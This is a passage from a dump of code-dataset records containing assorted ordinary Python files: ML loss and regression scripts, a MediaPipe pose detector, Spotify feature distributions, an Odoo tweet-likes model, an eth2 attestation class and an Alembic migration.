_compute_cross_entropy_losses(logits, labels, paddings):\n B, T, V = logits.shape\n losses = F.cross_entropy(logits.contiguous().view(-1, V),\n labels.contiguous().view(-1),\n reduction=\"none\").view(B, T) * (1-paddings).float()\n\n return losses\n", "sub_path": "src/criterions/cross_entropy_uer.py", "file_name": "cross_entropy_uer.py", "file_ext": "py", "file_size_in_byte": 5511, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "cross_entropy.CrossEntropyCriterion", "line_number": 15, "usage_type": "name"}, {"api_name": "tools.utils.sequence_mask", "line_number": 78, "usage_type": "call"}, {"api_name": "tools.utils", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.sqrt", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 86, "usage_type": "call"}, {"api_name": "loggings.metrics.log_scalar", "line_number": 100, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 100, "usage_type": "name"}, {"api_name": "loggings.metrics.log_scalar", "line_number": 104, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 104, "usage_type": "name"}, {"api_name": "loggings.metrics.log_scalar", "line_number": 107, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 107, "usage_type": "name"}, {"api_name": "loggings.metrics.log_scalar", "line_number": 110, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 110, "usage_type": "name"}, {"api_name": "loggings.metrics.log_scalar", "line_number": 112, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 112, "usage_type": "name"}, {"api_name": "loggings.metrics.log_derived", "line_number": 115, "usage_type": "call"}, {"api_name": "loggings.metrics", "line_number": 115, "usage_type": "name"}, {"api_name": "loggings.meters.safe_round", "line_number": 117, "usage_type": "call"}, {"api_name": "criterions.register_criterion", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 133, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 142, "usage_type": "name"}]} +{"seq_id": "216065726", "text": "import cv2 \nimport mediapipe as mp\nimport time\n\n\nclass poseDetect():\n def __init__(self,mode=False,upBody=False,smooth=True,detectioncon=0.5,trackcon=0.5):\n \"\"\"\n Initilize all required parameters\n mode : Bool, False if you wanna use track and True if using detection \n upBody : Bool, True if you wanna detect only up body else false\n smooth : Bool, True if smooth else false\n detectioncon : Float, value of detection confident \n trackcon : Float, value of trackcon\n \"\"\"\n self.mode=mode\n self.upBody = upBody\n self.smooth = smooth\n self.detectioncon=detectioncon \n self.trackcon=trackcon\n self.mpPose = mp.solutions.pose\n self.mpDraw = mp.solutions.drawing_utils\n self.pose = self.mpPose.Pose(self.mode,self.upBody,self.smooth,self.detectioncon,self.trackcon)\n\n def findPose(self,img,draw=True):\n \"\"\"\n Function which uses mediapipe to find and draw pose detected\n\n arguments :- \n img :- Frame for which you want to find pose\n draw :- Bool value, True if you want to draw the pose else False\n\n Returns :- \n img : Frame after drawing the cordinates given by mediapipe\n \"\"\"\n imgRGB= cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n #imgRGB= img # when you record in ubuntu color format is already RGB\n\n self.results = self.pose.process(imgRGB)\n landmark= self.results.pose_landmarks\n if landmark:\n if draw:\n self.mpDraw.draw_landmarks(img,landmark,self.mpPose.POSE_CONNECTIONS)\n else:\n self.mpDraw.draw_landmarks(img,landmark)\n return img\n\n def getPosition(self,img,draw=True):\n \"\"\"\n Function to get cordiinated of 33 key points detected and return them as a list \n\n arguments :-\n img : Frame for which key points needs to be detected\n Draw : Bool, True if want to draww detected coordinates on frame else false \n\n Returns :-\n list of 33 key points coordinates in a frame\n \"\"\"\n lmList=[]\n if self.results.pose_landmarks:\n for id,lm in enumerate(self.results.pose_landmarks.landmark):\n h,w,c = img.shape \n cx,cy,cz = int(lm.x*w), int(lm.y*h), int(lm.z*c) #to find value in pixels\n lmList.append([cx,cy])\n if draw:\n cv2.circle(img,(cx,cy), 4,(255,0,0),cv2.FILLED)\n return lmList\n \n\n", "sub_path": "Pose.py", "file_name": "Pose.py", "file_ext": "py", "file_size_in_byte": 2552, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "mediapipe.solutions", "line_number": 21, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 66, "usage_type": "attribute"}]} +{"seq_id": "49209185", "text": "#creates distributions of values corresponding to spotifys data\n#reports percentiles of values given these distributions\n\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom os import path\n\n#the following do not have a percentile associated with them\nNO_PERCENTILE = [\"key\",\"mode\",\"time_signature\",\"name\"]\n\n#descriptions of distributions of respective key\n#see more about these distributions at https://developer.spotify.com/documentation/web-api/reference/tracks/get-audio-features/\nFRACTION_DIST = {\"acousticness\":[3000,800,625,500,450,400,390,380,350,348,345,340,350,345,320,340,400,405,410,500],\n \"danceability\":[20,40,75,180,198,250,375,450,600,775,950,1010,1020,1050,1000,825,625,350,175,75],\n \"energy\":[190,150,200,240,250,300,350,400,495,560,600,650,640,750,770,800,725,720,705,535],\n \"instrumentalness\":[7600,100,75,50,75,75,50,50,50,25,25,50,50,60,75,100,150,225,300,125],\n \"liveness\":[250,2450,2900,965,650,500,625,480,200,175,160,155,150,155,160,150,140,145,145,145,160,175],\n \"speechiness\":[4800,2660,800,400,330,250,200,150,100,75,30,30,5,5,5,5,30,50,150,0],\n \"valence\":[320,380,440,550,510,595,600,650,550,575,585,650,525,540,490,485,475,400,360,315]}\n\n#tempo and loudness are unique, non-fractional, distributions\nLOUDNESS = [5,5,5,20,20,20,50,65,75,100,150,200,350,500,960,1550,2750,2850,550,25]\nTEMPO = [25,0,0,0,20,40,135,760,1125,1375,1200,1740,1300,760,510,500,250,100,75,10]\n\n#hold all created distributions keyed by their name\nALL_DIST = {}\n\n#creates an array distributed such that values correspond a histogram described by 'vals'\ndef create_distribution(vals, starting_val, bin_width):\n dist = np.zeros(1)\n i=0\n offset = starting_val\n\n #fill array with linearly spaced numbers found from 'vals'\n while i<20:\n temp = np.linspace(offset, offset+bin_width, vals[i])\n dist = np.concatenate((dist, temp))\n i+=1\n offset+=bin_width\n return dist\n\n#calculates 'num' percentile in distribution 'dist'\ndef get_percentile(name, num):\n return stats.percentileofscore(ALL_DIST[name],num)\n\n#find the percentiles for the attribute averages for the entire playlist\ndef get_overall_percentile(attribute_avg, attribute_percentile):\n for attr in attribute_avg:\n if attr not in NO_PERCENTILE:\n attribute_percentile[attr] = get_percentile(attr,attribute_avg[attr])\n\n#finds the most extreme song (percentile wise) for every attribute\ndef calculate_extreme_songs(songs, high_songs, low_songs):\n #loop through every song and its attributes\n for song in songs:\n for attr in songs[song]:\n if attr not in NO_PERCENTILE:\n percentile = round(get_percentile(attr, songs[song][attr]),2)\n #if the percentile is more extreme than anything encountered before, store it\n if percentile > high_songs[attr][1]:\n high_songs[attr] = [songs[song][\"name\"],percentile, songs[song][attr]]\n if percentile < low_songs[attr][1]:\n low_songs[attr] = [songs[song][\"name\"],percentile, songs[song][attr]]\n\n#loads distributions from a file or creates them if no file is found\ndef init():\n file_path = f\"{path.dirname(path.realpath(__file__))}/spotify_distributions.npy\"\n #if no distribution file is found create one\n if not path.exists(file_path):\n #create all the distributions\n for descrip in FRACTION_DIST:\n ALL_DIST[descrip] = create_distribution(FRACTION_DIST[descrip], 0, 0.05)\n\n #loudness and tempo are scaled differently, create seperately\n ALL_DIST[\"loudness\"] = create_distribution(LOUDNESS, -40, 2)\n ALL_DIST[\"tempo\"] = create_distribution(TEMPO, 0, 11)\n\n #song length is normally distributed, approx described as below\n ALL_DIST[\"duration_ms\"] = np.random.normal(242000, scale=75000, size=10000)\n\n np.save(\"spotify_distributions.npy\", ALL_DIST)\n else:\n #if file found, load it\n dist_file = np.load(file_path, allow_pickle=True)\n for item in dist_file.item():\n ALL_DIST[item] = dist_file.item().get(item)\n \n\n\n\n\n", "sub_path": "playsite/playlister/scripts/distributions.py", "file_name": "distributions.py", "file_ext": "py", "file_size_in_byte": 4207, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.stats.percentileofscore", "line_number": 46, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.realpath", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 81, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "512573796", "text": "import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# cf: https://github.com/antoine-eon/olga/tree/master/Algorithme/Algo%20Reseau%20Neuronal%20Regression%20Lineaire%20EX\n\n# Load the data and create the data matrices X and Y\n# This creates a feature vector X with a column of ones (bias)\n# and a column of car weights.\n# The target vector Y is a column of MPG values for each car.\n\nX_file = np.genfromtxt('mpg.csv', delimiter=',', skip_header=1)\nN = np.shape(X_file)[0]\nX = np.hstack((np.ones(N).reshape(N, 1), X_file[:, 4].reshape(N, 1)))\nY = X_file[:, 0]\n\n# Standardization\nX[:, 1] = (X[:, 1]-np.mean(X[:, 1]))/np.std(X[:, 1])\n\n# Two weights (bias and feature)\nw = np.array([0, 0])\n\n# Batch gradient descent\n# size eta\nmax_iter = 100\neta = 1e-4\nfor t in range(0, max_iter):\n print(t)\n # We iterate over each data point for one epoch\n grad_t = np.array([0., 0.])\n for i in range(0, N):\n x_i = X[i, :]\n y_i = Y[i]\n h = np.dot(w, x_i)-y_i\n grad_t += 2*x_i*h\n # Update the weights\n w = w - eta*grad_t\n \n # Plot the data and best fit line\n tt = np.linspace(np.min(X[:, 1]), np.max(X[:, 1]), 10)\n bf_line = w[0]+w[1]*tt\n plt.plot(X[:, 1], Y, 'kx', tt, bf_line)#, label = t)\n\n# Plot the data and best fit line\nplt.plot(X[:, 1], Y, 'kx', tt, bf_line, 'r-')\nplt.savefig('figure1.png')\n\nplt.show()\nprint(\"Weights found:\",w)\n\n\n", "sub_path": "ANNregression/ANNregression.py", "file_name": "ANNregression.py", "file_ext": "py", "file_size_in_byte": 1421, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 2, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "529659480", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 1 22:32:24 2018\n\n@author: BHAVI CHAWLA\n\"\"\"\n\n# Decision Tree Regression\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Position_Salaries.csv')\nX = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, 2].values\n\n# Fitting Decision Tree Regression to the dataset\nfrom sklearn.tree import DecisionTreeRegressor\n# all default paramenters\nregressor = DecisionTreeRegressor(random_state = 0) # default criterion - mean square error\nregressor.fit(X, y)\n\n# Predicting a new result\ny_pred = regressor.predict(6.5)\n\n\n# Visualising the Regression results\n''' problem coz of resolution - Non linear, Non Continuous '''\n''' in this plot, it is predicting the scattered points of the dataset i.e the 10 points '''\n#plt.scatter(X, y, color = 'red')\n#plt.plot(X, regressor.predict(X), color = 'blue')\n#plt.title('Truth or Bluff (Decision Tree Regression)')\n#plt.xlabel('Position level')\n#plt.ylabel('Salary')\n#plt.show()\n\n# Visualising the Decision Tree Regression results (higher resolution)\n''' Splitting into intervals, considering avg of values in interval and assigning it to the point for which we need prediction '''\nX_grid = np.arange(min(X), max(X), 0.01)\nX_grid = X_grid.reshape((len(X_grid), 1))\nplt.scatter(X, y, color = 'red')\nplt.plot(X_grid, regressor.predict(X_grid), color = 'blue')\nplt.title('Truth or Bluff (Decision Tree Regression)')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.show()", "sub_path": "Part 2 - Regression/Section 8 - Decision Tree Regression/Decision_Tree_Regression/decision_tree_regression_own.py", "file_name": "decision_tree_regression_own.py", "file_ext": "py", "file_size_in_byte": 1540, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "552592309", "text": "'''\nFunction Arguments :\n\t\t@param :m (boolean matrix of size n*n), n(no of rows and cols )\n\t\t@return : Integer\n'''\ndef getId(arr,n):\n ans = -1\n for i in range(n):\n count = 0\n for j in arr[i]:\n \n if j == 0:\n count += 1\n else:\n break\n if count == n and ans == -1:\n ans = i\n elif count == n:\n return -1\n return ans\n\n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\nimport atexit\nimport io\nimport sys\n\n#Contributed by :Shardul Rane\n\n_INPUT_LINES = sys.stdin.read().splitlines()\ninput = iter(_INPUT_LINES).__next__\n_OUTPUT_BUFFER = io.StringIO()\nsys.stdout = _OUTPUT_BUFFER\n\n@atexit.register\n\ndef write():\n sys.__stdout__.write(_OUTPUT_BUFFER.getvalue())\n\nif __name__ == '__main__':\n test_cases = int(input())\n for cases in range(test_cases) :\n n = int(input())\n a = list(map(int,input().strip().split()))\n k = 0\n m = []\n for i in range(n):\n row = []\n for j in range(n):\n row.append(a[k])\n k+=1\n m.append(row)\n print(getId(m,n))\n# } Driver Code Ends", "sub_path": "GeeksForGeeks/celebrity_problem.py", "file_name": "celebrity_problem.py", "file_ext": "py", "file_size_in_byte": 1191, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.stdin.read", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 33, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 36, "usage_type": "attribute"}, {"api_name": "sys.__stdout__.write", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.__stdout__", "line_number": 41, "usage_type": "attribute"}, {"api_name": "atexit.register", "line_number": 38, "usage_type": "attribute"}]} +{"seq_id": "458258208", "text": "\"\"\"\nA function to test for a multiple/nonmultiple hit.\nThe detection of multiplicated genes is valuable both by itself (as a chapter in\nmy thesis) and as a stage in a phylomic analysis. An alignment of multiplicated\ngene to its non-multiplicated counterpart is unreliable, as the short one will\nmore or less randomly align to one of the modules of the multiple. It creates a\nlot of problems: the distance calculated is one of several equally valid values\n(one for each module), the alignment for ML/bayesian is needlessly bloated, a\nremarkable evolutionary event is ignored altogether.\nCurrently I assume that a multiplication of a gene is much more common than a\npreviously repeat-containing gene being split in pieces. Thus, the (ancestral)\nshorter form is always assumed to be in a hit, and the longer in a query.\n\"\"\"\n\nfrom itertools import combinations\n\n\ndef overlap(range1, range2):\n \"\"\"\n Return True if two ranges overlap\n :param range1:\n :param range2:\n :return:\n \"\"\"\n if range1[0] <= range2[1] and range2[0] <= range1[1]:\n return True\n return False\n\n\ndef overlap_len(range1, range2):\n \"\"\"\n Return the overlap length between two ranges\n :param range1:\n :param range2:\n :return:\n \"\"\"\n return min(range1[1], range2[1]) - max(range1[0], range2[0])\n\n\ndef is_duplicate(hit, overlap_cutoff=0.5, len_cutoff=50):\n \"\"\"\n Return True if this hit covers several regions of query sequence with the\n same region of hit sequence.\n Accepts two optional parameters:\n `len_cutoff` is a minimum length (on hit) an HSP must have to be considered\n meaningful. Defaults to 50.\n `overlap_cutoff` is a minimum percentage of both hsps that should be in the\n overlap for it to be considered meaningful. Defaults to 0.5\n :param hit: BlastHit\n :param overlap_cutoff: int\n :param len_cutoff: int\n :return:\n \"\"\"\n if len(hit.hsps) < 2:\n # Obviously one-HSP hit can't have the evidence we look for\n return False\n valid_hsps = filter(lambda x: abs(x.hit_pos[1]-x.hit_pos[0]) > len_cutoff,\n hit.hsps)\n for h1, h2 in combinations(valid_hsps, 2):\n if overlap(h1.hit_pos, h2.hit_pos) and \\\n not overlap(h1.query_pos, h2.query_pos):\n l = overlap_len(h1.hit_pos, h2.hit_pos)\n if l >= abs(h1.hit_pos[1]-h1.hit_pos[0]) * overlap_cutoff and \\\n l >= abs(h2.hit_pos[1]-h2.hit_pos[0]) * overlap_cutoff:\n return True\n return False\n", "sub_path": "multiplicates.py", "file_name": "multiplicates.py", "file_ext": "py", "file_size_in_byte": 2511, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "itertools.combinations", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "221392097", "text": "import logging\nimport tweepy\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\n\n\nLOGGER = logging.getLogger(__name__)\nSOCIAL_NETWORK = [('twitter', 'Twitter')]\n\n\nclass ProductSocial(models.Model):\n\n _name = 'bp.product.social'\n _rec_name = 'product_id'\n _sql_constraints = [('social_network_unique', 'unique(social_network)',\n _('The URL must be unique'))]\n\n product_id = fields.Many2one(\n comodel_name='product.product',\n string=_('Product'),\n required=True\n )\n\n social_url = fields.Char(string=_('Social URL'), required=True)\n\n likes = fields.Integer(string=_('Likes'), readonly=True)\n\n social_network = fields.Selection(\n selection=SOCIAL_NETWORK,\n string=_('Social network'),\n required=True\n )\n\n @api.model\n def get_tweet_id_from(self, url):\n import re\n temp = re.findall(r'\\d+', url)\n res = list(map(int, temp))\n return str(max(res))\n\n @api.model\n def get_likes(self, network='twitter'):\n LOGGER.info(\"Fetching likes from tweets about products...\")\n\n try:\n access = self.env['bp.access.api'].search([('name', '=', network)])\n\n CONSUMER_KEY = access.consumer_key\n CONSUMER_SECRET = access.consumer_secret\n\n OAUTH_TOKEN = access.oauth_token\n OAUTH_TOKEN_SECRET = access.oauth_token_secret\n\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\n api = tweepy.API(auth)\n\n for rec in self.env['bp.product.social'].search([]):\n id_of_tweet = self.get_tweet_id_from(rec.social_url)\n tweet = api.get_status(id_of_tweet)\n rec.write({'likes': tweet._json['favorite_count']})\n\n except tweepy.error.TweepError:\n raise UserError(\n _('Please, register your credentials on Access tokens'))\n", "sub_path": "addons/bp_social_selling/models/product_social.py", "file_name": "product_social.py", "file_ext": "py", "file_size_in_byte": 1976, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "odoo.models.Model", "line_number": 11, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 11, "usage_type": "name"}, {"api_name": "odoo._", "line_number": 16, "usage_type": "call"}, {"api_name": "odoo.fields.Many2one", "line_number": 18, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 18, "usage_type": "name"}, {"api_name": "odoo._", "line_number": 20, "usage_type": "call"}, {"api_name": "odoo.fields.Char", "line_number": 24, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 24, "usage_type": "name"}, {"api_name": "odoo._", "line_number": 24, "usage_type": "call"}, {"api_name": "odoo.fields.Integer", "line_number": 26, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 26, "usage_type": "name"}, {"api_name": "odoo._", "line_number": 26, "usage_type": "call"}, {"api_name": "odoo.fields.Selection", "line_number": 28, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 28, "usage_type": "name"}, {"api_name": "odoo._", "line_number": 30, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 37, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 34, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 34, "usage_type": "name"}, {"api_name": "tweepy.OAuthHandler", "line_number": 54, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 56, "usage_type": "name"}, {"api_name": "tweepy.API", "line_number": 56, "usage_type": "call"}, {"api_name": "odoo.api.get_status", "line_number": 60, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 60, "usage_type": "name"}, {"api_name": "tweepy.error", "line_number": 63, "usage_type": "attribute"}, {"api_name": "odoo.exceptions.UserError", "line_number": 64, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 65, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 41, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "274597294", "text": "from eth.constants import (\n ZERO_HASH32,\n)\n\nfrom eth_typing import (\n Hash32,\n)\n\nimport ssz\nfrom ssz.sedes import (\n bytes32,\n)\n\nfrom eth2.beacon.types.checkpoints import (\n Checkpoint,\n default_checkpoint,\n)\nfrom eth2.beacon.types.crosslinks import (\n Crosslink,\n default_crosslink,\n)\nfrom eth_utils import (\n humanize_hash,\n)\n\n\nclass AttestationData(ssz.Serializable):\n\n fields = [\n # LMD GHOST vote\n ('beacon_block_root', bytes32),\n\n # FFG vote\n ('source', Checkpoint),\n ('target', Checkpoint),\n\n # Crosslink vote\n ('crosslink', Crosslink),\n ]\n\n def __init__(self,\n beacon_block_root: Hash32=ZERO_HASH32,\n source: Checkpoint=default_checkpoint,\n target: Checkpoint=default_checkpoint,\n crosslink: Crosslink=default_crosslink) -> None:\n super().__init__(\n beacon_block_root=beacon_block_root,\n source=source,\n target=target,\n crosslink=crosslink,\n )\n\n def __str__(self) -> str:\n return (\n f\"beacon_block_root={humanize_hash(self.beacon_block_root)[2:10]}\"\n f\" source={self.source}\"\n f\" target={self.target}\"\n f\" | CL={self.crosslink}\"\n )\n\n\ndefault_attestation_data = AttestationData()\n", "sub_path": "eth2/beacon/types/attestation_data.py", "file_name": "attestation_data.py", "file_ext": "py", "file_size_in_byte": 1353, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "ssz.Serializable", "line_number": 27, "usage_type": "attribute"}, {"api_name": "ssz.sedes.bytes32", "line_number": 31, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 34, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 35, "usage_type": "name"}, {"api_name": "eth2.beacon.types.crosslinks.Crosslink", "line_number": 38, "usage_type": "name"}, {"api_name": "eth_typing.Hash32", "line_number": 42, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 43, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 44, "usage_type": "name"}, {"api_name": "eth2.beacon.types.crosslinks.Crosslink", "line_number": 45, "usage_type": "name"}, {"api_name": "eth.constants.ZERO_HASH32", "line_number": 42, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.default_checkpoint", "line_number": 43, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.default_checkpoint", "line_number": 44, "usage_type": "name"}, {"api_name": "eth2.beacon.types.crosslinks.default_crosslink", "line_number": 45, "usage_type": "name"}, {"api_name": "eth_utils.humanize_hash", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "573663762", "text": "#\n# Copyright (C) 2017 Red Hat, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Create files events on existing datas\n\nRevision ID: ad1134e557de\nRevises: 61b68c2d66b5\nCreate Date: 2017-04-21 15:20:00.263439\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'ad1134e557de'\ndown_revision = '61b68c2d66b5'\nbranch_labels = None\ndepends_on = None\n\nfrom dci.db import models\n\nfrom alembic import op\nfrom sqlalchemy.dialects import postgresql as pg\nimport sqlalchemy as sa\nfrom sqlalchemy import sql\n\n\nFILES = sa.Table(\n 'files', sa.MetaData(),\n sa.Column('id', pg.UUID(as_uuid=True), primary_key=True))\n\n\ndef upgrade():\n db_conn = op.get_bind()\n\n query_all_files_ids = sql.select([FILES.c.id])\n all_files_ids = db_conn.execute(query_all_files_ids).fetchall()\n\n for file_id in all_files_ids:\n values = {'file_id': file_id['id'],\n 'action': models.FILES_CREATE}\n q_add_file_event = models.FILES_EVENTS.insert().values(**values)\n db_conn.execute(q_add_file_event)\n\n\ndef downgrade():\n pass\n", "sub_path": "dci/alembic/versions/ad1134e557de_create_files_events_on_existing_datas.py", "file_name": "ad1134e557de_create_files_events_on_existing_datas.py", "file_ext": "py", "file_size_in_byte": 1549, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sqlalchemy.Table", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 39, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.UUID", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 40, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 44, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 44, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.select", "line_number": 46, "usage_type": "call"}, {"api_name": "sqlalchemy.sql", "line_number": 46, "usage_type": "name"}, {"api_name": "dci.db.models.FILES_CREATE", "line_number": 51, "usage_type": "attribute"}, {"api_name": "dci.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "dci.db.models.FILES_EVENTS.insert", "line_number": 52, "usage_type": "call"}, {"api_name": "dci.db.models.FILES_EVENTS", "line_number": 52, "usage_type": "attribute"}, {"api_name": "dci.db.models", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "377337690", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport 